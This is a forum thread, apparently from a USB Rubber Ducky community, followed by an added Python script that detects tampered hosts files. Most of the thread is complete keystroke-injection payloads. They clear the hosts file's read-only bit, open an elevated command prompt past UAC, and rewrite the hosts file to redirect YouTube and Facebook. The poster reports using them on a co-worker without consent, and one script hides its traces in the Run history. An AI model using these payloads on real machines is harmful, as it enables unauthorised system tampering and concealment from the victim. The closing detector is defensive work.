
Ello everyone,

I am very new with the ducky, and I am looking for some help.

As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisoning, but I can't get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few other random DNS poisoning/hosts mod scripts that I found on here and other websites. No luck.

Is there a way to:

1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder

2. delete "hosts" file in \Windows\System32\drivers\etc folder

3. rename "hosts.txt" to just "hosts"

Please, no powershell. It seems pretty simple, but I still have no idea what I am doing. :wacko:


Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7.

Change hosts file (read-only) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4

Change hosts file (write access) to redirect Youtube + Facebook to Google.

DELAY 3000
DEFAULT_DELAY 250

GUI d
CONTROL N
ALT f
STRING W
DELAY 500
STRING S
DELAY 500
STRING CMD.EXE
ENTER
STRING COMMANDPROMPT
ENTER
DELAY 500
STRING COMMANDPROMPT
SHIFT F10
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
ALT F4
GUI d
CONTROL N
STRING COMMANDPROMPT
DELETE
ENTER
ALT F4


After messing around with it a little bit, I cleaned it up. Then I successfully tested it on a lazy co-worker who surfs the net all day. :D This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem.

The first time you use this, the hosts file will be read-only. Use this:

DELAY 3000
DEFAULT_DELAY 250
REM Open Explorer at the hosts directory, select everything, open Properties (R)
GUI r
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
ENTER
CONTROL A
SHIFT F10
STRING R
DELAY 500
REM SPACE toggles the Read-only box; the remaining keys step through the confirmation prompts
SPACE
ENTER
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT F4
REM Elevated cmd: Start menu search for cmd, context menu (MENU), A = Run as administrator,
REM then LEFT + ENTER to answer the UAC prompt
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
REM Remove the current hosts file, then retype it in Notepad
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
REM Letter case is inverted on purpose: this is meant to run with Caps Lock on
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
REM The redirect entries: YouTube and Facebook names mapped to a Google address
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
REM Save; Notepad appends .txt, which the RENAME below strips off again
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER
DELAY 500
REM The "clear run history" step: MSCONFIG becomes the most recent entry in the Run box
GUI r
STRING MSCONFIG
ENTER
DELAY 750
ALT F4

After using the previous script once, the host files will be read-write. Use this:

DELAY 3000
DEFAULT_DELAY 250
REM Elevated cmd: Start menu search for cmd, context menu (MENU), A = Run as administrator,
REM then LEFT + ENTER to answer the UAC prompt
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
MENU
DELAY 500
STRING A
ENTER
DELAY 750
LEFT
ENTER
DELAY 750
REM Remove the current hosts file, then retype it in Notepad
STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 500
STRING %windir%\system32\notepad.exe
ENTER
DELAY 500
REM Letter case is inverted on purpose: this is meant to run with Caps Lock on
DEFAULT_DELAY 0
STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
ENTER
STRING #
ENTER
STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
ENTER
STRING #
ENTER
STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
ENTER
STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
ENTER
STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
ENTER
STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
ENTER
STRING # SPACE.
ENTER
STRING #
ENTER
STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
ENTER
STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
ENTER
STRING #
ENTER
STRING # fOR EXAMPLE:
ENTER
STRING #
ENTER
STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
ENTER
STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
ENTER
ENTER
STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
ENTER
STRING # 127.0.0.1 LOCALHOST
ENTER
STRING # ::1 LOCALHOST
ENTER
ENTER
REM The redirect entries: YouTube and Facebook names mapped to a Google address
STRING 74.125.228.97 YOUTUBE.COM
ENTER
STRING 74.125.228.97 WWW.YOUTUBE.COM
ENTER
STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER
DEFAULT_DELAY 250
REM Save; Notepad appends .txt, which the RENAME below strips off again
CONTROL S
STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
ENTER
DELAY 500
STRING EXIT
ENTER


On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds. :ph34r:

STRING 74.125.228.97 FACEBOOK.COM
ENTER
STRING 74.125.228.97 WWW.FACEBOOK.COM
ENTER

STRING 74.125.228.97 MOBILE.FACEBOOK.COM
ENTER

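Added example, not part of this thread: the defensive counterpart of the payload above. Windows consults %WINDIR%\System32\drivers\etc\hosts before it asks DNS, so the whole attack is a handful of lines mapping public names to a routable address. This Python check parses a hosts file, drops comments and blank lines, and reports every mapping that is not an expected loopback entry, which catches both the YouTube/Facebook redirects the scripts write (including the mobile.facebook.com line from the follow-up) and sinkholed names pointed at 127.0.0.1. The sample hosts text and the EXPECTED_LOCAL set are constructed for the example; on a real machine you would feed it the actual hosts file.

```python
r"""Hosts-file tamper check (added example, not from the thread).

Reports every mapping in a hosts file that is not an expected loopback
entry: public names pointed at a routable address (a redirect, as in the
posted payload) and unexpected names pointed at loopback (a sinkhole).
"""

import ipaddress
from typing import Dict, List, Tuple

# Constructed sample input: the entries the posted script leaves behind
# (the script types them with Caps Lock on, so they land in normal case)
# plus the mobile.facebook.com line from the follow-up post.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#\t127.0.0.1       localhost
#\t::1             localhost

74.125.228.97 youtube.com
74.125.228.97 www.youtube.com
74.125.228.97 facebook.com   # a trailing comment is legal
74.125.228.97 www.facebook.com
74.125.228.97 mobile.facebook.com
127.0.0.1 localhost
::1 localhost
"""

# Assumption: the only names this machine is expected to map locally.
# Replace with whatever your baseline hosts file contains.
EXPECTED_LOCAL = {"localhost"}

Entry = Tuple[str, str, int]  # (address, hostname, line number)


def parse_hosts(text: str) -> List[Entry]:
    """Return one (address, name, line_no) tuple per active mapping.

    Everything after '#' is a comment, blank lines are skipped, and one
    address may be followed by several names on the same line.
    """
    entries: List[Entry] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            entries.append((addr, name.lower(), line_no))
    return entries


def is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8, ::1 and the unspecified addresses."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # not an IP literal at all; treat it as suspicious
    return ip.is_loopback or ip.is_unspecified


def find_suspicious(text: str) -> Dict[str, List[Tuple[str, int]]]:
    """Group every mapping that is not an expected loopback entry by target.

    A routable target means the name is being redirected; a loopback target
    for a name outside EXPECTED_LOCAL means the name is being sinkholed.
    """
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for addr, name, line_no in parse_hosts(text):
        if is_loopback(addr) and name in EXPECTED_LOCAL:
            continue
        hits.setdefault(addr, []).append((name, line_no))
    return hits


def report(text: str) -> List[str]:
    """One human-readable line per target address."""
    out: List[str] = []
    for addr, names in find_suspicious(text).items():
        kind = "sinkholed" if is_loopback(addr) else "redirected"
        joined = ", ".join(f"{n} (line {ln})" for n, ln in names)
        out.append(f"{kind} to {addr}: {joined}")
    return out


if __name__ == "__main__":
    # On a Windows host, read %WINDIR%\System32\drivers\etc\hosts into
    # `text` instead of using the constructed sample.
    for line in report(SAMPLE_HOSTS):
        print(line)
```

The check is deliberately independent of the file's attributes: the scripts above clear the Read-only bit and rewrite the file, so a hash of the file against a known-good baseline is the quicker alarm, and this parser is what tells you which names were hijacked once that alarm fires.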
